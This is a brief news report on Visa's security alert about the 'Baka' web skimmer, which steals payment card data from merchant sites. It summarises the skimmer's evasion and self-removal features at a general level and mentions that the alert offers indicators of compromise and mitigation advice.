Visa has released a security alert regarding a new advanced e-skimmer dubbed “Baka” that implements new features to evade detection and is able to remove itself once payment card details have been exfiltrated.
The new malware was discovered by researchers with Visa’s Payment Fraud Disruption (PFD) initiative in February 2020 while analyzing a command and control (C2) server that was previously observed hosting the ImageID skimmer variant. Although the skimmer itself is basic and contains features common for many e-commerce skimming kits, such as data exfiltration using image requests and configurable target form fields, Baka has some advanced capabilities suggesting it was developed by a skilled malware author.
“The most compelling components of this kit are the unique loader and obfuscation method. The skimmer loads dynamically to avoid static malware scanners and uses unique encryption parameters for each victim to obfuscate the malicious code. PFD assesses that this skimmer variant avoid s detection and analysis by removing itself from memory when it detects the possibility of dynamic analysis with Developer tools or when data has been successfully exfiltrated,” the warning said.
PFD researchers found the Baka skimmer on several merchant websites across the world that are using Visa’s eTD capability.
Visa's security alert also provides Indicators of Compromise (IoC) and best practices and mitigation measures that organizations can implement to defend themselves from this new threat.